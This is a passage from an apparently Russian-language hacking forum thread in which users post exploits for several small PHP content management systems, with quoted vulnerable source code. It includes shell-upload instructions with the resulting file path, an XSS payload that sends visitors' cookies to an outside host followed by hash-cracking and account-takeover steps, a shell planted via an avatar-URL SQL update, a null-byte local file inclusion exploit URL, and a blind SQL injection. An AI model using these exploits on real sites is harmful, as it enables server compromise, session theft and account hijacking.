[/COLOR][COLOR="#DD0000"]'Audio file 2'[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]'Audio file 3'[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]'Audio file 4'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]/*Fetching user's uploaded audio files*/
[/COLOR][COLOR="#0000BB"]$userid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$arrUser[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_idnr'[/COLOR][COLOR="#007700"]];
if([/COLOR][COLOR="#0000BB"]intval[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$userid[/COLOR][COLOR="#007700"])!=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$sqlAudioFiles[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT id,file_name,resource_id FROM AUDIO_FILES WHERE user_id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$userid[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$arrResAudioFiles[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$hdlDb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fnFetchQueryResult[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sqlAudioFiles[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]BR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]__FILE__[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]BR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' in '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]__FUNCTION__[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'(); 20050705_032027 '[/COLOR][COLOR="#007700"]) ;
if([/COLOR][COLOR="#0000BB"]count[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$arrResAudioFiles[/COLOR][COLOR="#007700"])>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"----Your Audio Clips----"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$selected[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
foreach ([/COLOR][COLOR="#0000BB"]$arrResAudioFiles[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$arrRow[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$arrRow[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file_name'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
}
}
return[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"];
}
}
....
[/COLOR][/COLOR]
Usage:
-> Регаем юзера
-> В медиа-меню заливаем шелл "в открытом виде".
-> Методика именования заливаемых файлов следующая:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$ShellName[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]]) .[/COLOR][COLOR="#DD0000"]"_"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]];[/COLOR][/COLOR]
-> То бишь заливая шелл shell.php будет именован(и расположен):
Код:
Code:
site.com/resources/audiodir/25a452927110e39a345a2511c57647f2_shell.php
|
|
|
|
04.08.2011, 13:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
4100
Репутация:
74
|
|
SVCMS beta 1 (угоняем куки)
Еще один двиг не без прибабаха...
Мега кодеры этого двига при авторизации выдают след.куки:
Код:
Code:
__qca=P0-464638314-1305237775445; crocmint_aff=697b75;
POSTAff2Cookie=697b75_137d839c;
POSTAff2TimeCookie=1305037573_1308127486_7;
POSTAff2ClickCookie=d9913101; PAPR_0=1305557527_http%253A//temp/;
SVCMS_userid=1;
SVCMS_md5passwd=e5c72dd4eca5301feca1bb0985eed55f;
SVCMS_randomstring=13123908414e397eb92e187;
PHPSESSID=bmkmssmcvtbcoreee5uqj49vp6
наблюдаем это здесь( user.php):
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"].....
*[/COLOR][COLOR="#0000BB"]Set the cookies
[/COLOR][COLOR="#007700"]*/
private function[/COLOR][COLOR="#0000BB"]set_login_cookies[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$logout[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$expire_val[/COLOR][COLOR="#007700"]= ( ([/COLOR][COLOR="#0000BB"]$logout[/COLOR][COLOR="#007700"]) ? ([/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]() -[/COLOR][COLOR="#0000BB"]30[/COLOR][COLOR="#007700"]) :[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]() +[/COLOR][COLOR="#0000BB"]1209600[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// 1209600 is two weeks
[/COLOR][COLOR="#0000BB"]$randomstring[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]uniqid[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]());
[/COLOR][COLOR="#0000BB"]$md5_pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#0000BB"]$randomstring[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$cookies[/COLOR][COLOR="#007700"]= array(
[/COLOR][COLOR="#DD0000"]'SVCMS_userid'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'userid'[/COLOR][COLOR="#007700"]],
[/COLOR][COLOR="#DD0000"]'SVCMS_md5passwd'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$md5_pass[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'SVCMS_randomstring'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$randomstring[/COLOR][COLOR="#007700"],
);
foreach([/COLOR][COLOR="#0000BB"]$cookies[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$cookie[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$cookie_value[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]setcookie[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cookie[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$cookie_value[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$expire_val[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]);
}
return[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
}
.........[/COLOR][/COLOR]
И в добавок к этому они оставили активную xss в комментах!
То бишь:
Код:
Code:
img = new Image(); img.src = "http://day.mne/svoi.kuki?ciuda="+document.cookie;
-> Регулярим id и хэш, а так же $_SERVER['HTTP_REFERER']
-> брутим хэш (md5)
-> возвращаемся на $_SERVER['HTTP_REFERER']
-> смотрим ник по id (ссылка на нике комментирующих)
-> действуем по совести
|
|
|
|
05.08.2011, 00:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
4100
Репутация:
74
|
|
MMO Games CMS 1.2 Final [shell upload]
(вроде "линеечный" двиг)
Есть файл, в нем функция, обновляющая запись таблицы 'accounts' (конкретно - поле урла авы)
functions.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]allow[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$sqlQuery[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT `login`, `password` FROM `accounts` WHERE `login` = '[/COLOR][COLOR="#0000BB"]$username[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"];
if(([/COLOR][COLOR="#0000BB"]$records[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sqlQuery[/COLOR][COLOR="#007700"])) !==[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]base64_encode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]pack[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"H*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]sha1[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]utf8_encode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"]))));
[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_object[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$records[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]password[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'UserID'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]login[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"location: index.php"[/COLOR][COLOR="#007700"]);
}
}
}
[/COLOR][COLOR="#0000BB"]UserIDCheck[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'UserID'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Password'[/COLOR][COLOR="#007700"]]);
}
if(isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'update'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'update'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]"avatarurl"[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$avatarURL[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]safe[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'avatarURL'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"UPDATE `accounts` SET `avatar`='[/COLOR][COLOR="#0000BB"]$avatarURL[/COLOR][COLOR="#DD0000"]' WHERE `login`=' .[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'UserID'] . '"[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#FF8000"]# L2jEXODUS's CUSTOM MODDIFICATIONs - :::: END ::::
#------------------------------------------------------------------------------
[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
И если передать в POST запросе (на site.com/index.php?update=avatarurl) единственный параметр avatarURL со значением
то можно получить в полне готовый шелл...
путь_до_корня - site.com/includes/sidemenu.php
|
|
|
|
13.08.2011, 13:07
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Fapos CMS 1.1.8(Последняя версия)
1. Обход ЧПУ
.htacess:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#0000BB"]RewriteEngine On
RewriteBase[/COLOR][COLOR="#007700"]/
[/COLOR][COLOR="#0000BB"]RewriteCond[/COLOR][COLOR="#007700"]%{[/COLOR][COLOR="#0000BB"]REQUEST_FILENAME[/COLOR][COLOR="#007700"]} !-[/COLOR][COLOR="#0000BB"]d
RewriteCond[/COLOR][COLOR="#007700"]%{[/COLOR][COLOR="#0000BB"]REQUEST_FILENAME[/COLOR][COLOR="#007700"]} !-[/COLOR][COLOR="#0000BB"]f
RewriteRule[/COLOR][COLOR="#007700"]^(.*)$[/COLOR][COLOR="#0000BB"]index[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]=$[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]QSA[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]L[/COLOR][COLOR="#007700"]]
[/COLOR][/COLOR]
Возможен обход ЧПУ(Что нам поможет в эксплуатации GET уязвимостей). Ну а на сам ЧПУ конечно же идёт фильтр:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(![/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'#^[\#/\?&_\-=\.а-яa-z0-9]*$#ui'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]urldecode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_URI'[/COLOR][COLOR="#007700"]])))
...
[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
Который пропускает \n в конце строки
2. LFI
Зависимости: MQ=off, отключенная проверка URL на SQL-inj, бинарнонесовместимая функция is_file и include_once.
Файл: index.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (!isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'url'[/COLOR][COLOR="#007700"]])) {
...
} else {
[/COLOR][COLOR="#0000BB"]$pathParams[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'url'[/COLOR][COLOR="#007700"]]);
foreach ([/COLOR][COLOR="#0000BB"]$pathParams[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]) {
if (empty([/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"])) unset([/COLOR][COLOR="#0000BB"]$pathParams[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]]);
}
}
if (empty([/COLOR][COLOR="#0000BB"]$pathParams[/COLOR][COLOR="#007700"])) {
...
}
[/COLOR][COLOR="#FF8000"]//may be i need upgrade this...hz
[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]count[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$pathParams[/COLOR][COLOR="#007700"]) ==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'#^\d+$#'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$pathParams[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]])) {
...
} else if ([/COLOR][COLOR="#0000BB"]count[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$pathParams[/COLOR][COLOR="#007700"]) ==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) {
...
}
foreach ([/COLOR][COLOR="#0000BB"]$pathParams[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$pathParams[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"]);
}
return[/COLOR][COLOR="#0000BB"]$pathParams[/COLOR][COLOR="#007700"];
...
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]callAction[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$pathParams[/COLOR][COLOR="#007700"]);
...[/COLOR][COLOR="#FF8000"]//function callAction($params)
[/COLOR][COLOR="#007700"]if (![/COLOR][COLOR="#0000BB"]is_file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'modules/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$params[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]) .[/COLOR][COLOR="#DD0000"]'/index.php'[/COLOR][COLOR="#007700"])) {
...
}
include_once[/COLOR][COLOR="#DD0000"]'modules/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$params[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]) .[/COLOR][COLOR="#DD0000"]'/index.php'[/COLOR][COLOR="#007700"];
[/COLOR][/COLOR]
Обычные слэши использовать нельзя, однако кроме них можно ещё кучей способов эуспулотировать LFI: http://wfuzz.googlecode.com/svn-history/r2/trunk/wordlist/vulns/dirTraversal-nix.txt
Остальной код в CMS разбросан по модулям(Это будут уже уязвимости модулей.).
Эксплоит: /?url=news\index.php%00h
|
|
|
|
15.08.2011, 17:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
4100
Репутация:
74
|
|
ExpCMS blind sql-inj
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
* @copyright Copyright (C) 2003 Piotr Usewicz
* @access public
* @package ExpCMS
* @subpackage Auth
*/
[/COLOR][COLOR="#007700"]class[/COLOR][COLOR="#0000BB"]Auth
[/COLOR][COLOR="#007700"]{
[/COLOR][COLOR="#FF8000"]/**
* AuthStart: Used for initializing main functions for auth
* @access public
*/
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]AuthStart[/COLOR][COLOR="#007700"]()
{
global[/COLOR][COLOR="#0000BB"]$_EXPCMS[/COLOR][COLOR="#007700"];
}[/COLOR][COLOR="#FF8000"]// end func AuthStart()
/**
* Authenticate: Checks whether user name and password are valid
* @access public
* @param string User name
* @param string User password
* @return boolean True/False if authentication is ok/not ok
*/
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]Authenticate[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$user_name[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$user_password[/COLOR][COLOR="#007700"])
{
global[/COLOR][COLOR="#0000BB"]$_EXPCMS[/COLOR][COLOR="#007700"];
if ( isset ([/COLOR][COLOR="#0000BB"]$user_name[/COLOR][COLOR="#007700"]) && isset ([/COLOR][COLOR="#0000BB"]$user_password[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_EXPCMS[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Execute[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT user_id, user_pass from "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_EXPCMS[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]GetVar[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Tables.Auth"[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]" where user_name = '[/COLOR][COLOR="#0000BB"]$user_name[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]===[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]RaiseError[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]__FILE__[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]__LINE__[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"Error executing db query:"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_EXPCMS[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]ErrorMsg[/COLOR][COLOR="#007700"]() );
}
else
{
[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_EXPCMS[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]GetArray[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#FF8000"]// check if login is correct, if yes, save session variables
[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$user_pass[/COLOR][COLOR="#007700"]) ==[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_pass'[/COLOR][COLOR="#007700"]] )
{
[/COLOR][COLOR="#0000BB"]$_EXPCMS[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]session[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]SessionRegister[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"authenticated"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$_EXPCMS[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]session[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]SessionRegister[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"user_name"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$user_name[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$_EXPCMS[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]session[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]SessionRegister[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"user_pass"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_pass'[/COLOR][COLOR="#007700"]] );
[/COLOR][COLOR="#0000BB"]$_EXPCMS[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]session[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]SessionRegister[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"user_id"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_id'[/COLOR][COLOR="#007700"]] );
[/COLOR][COLOR="#FF8000"]// when authenticated
[/COLOR][COLOR="#0000BB"]$_EXPCMS[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]session[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]SessionRegister[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"timestamp"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]() );
[/COLOR][COLOR="#FF8000"]// time since last action... used for session/auth timeout
[/COLOR][COLOR="#0000BB"]$_EXPCMS[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]session[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]SessionRegister[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"idle"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]() );
return[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
}
else
{
return[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
}
}
}
}[/COLOR][COLOR="#FF8000"]// end func Authenticate()
/**
* IsAuthenticated: Checks if user is authenticated
* @access public
* @param string User name
* @return boolean Whether is or not authenticated
*/
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]IsAuthenticated[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$user_name[/COLOR][COLOR="#007700"])
{
global[/COLOR][COLOR="#0000BB"]$_EXPCMS[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]// check if we got the session variables set
[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$_EXPCMS[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]session[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]SessionIs[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"authenticated"[/COLOR][COLOR="#007700"]) &&[/COLOR][COLOR="#0000BB"]$_EXPCMS[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]session[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]SessionGet[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"authenticated"[/COLOR][COLOR="#007700"]) ==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])
{
return[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
}
else
{
return[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
}
}[/COLOR][COLOR="#FF8000"]// end func IsAuthenticated()
/**
* SetIdle: Sets new idle time
*
* Used when user has performed an action. Refreshes the last action time.
* When idle time is too long, session can be timed out.
*
* @access public
* @param integer Optional - new idle time to add to current time
*/
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]SetIdle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$time[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])
{
global[/COLOR][COLOR="#0000BB"]$_EXPCMS[/COLOR][COLOR="#007700"];
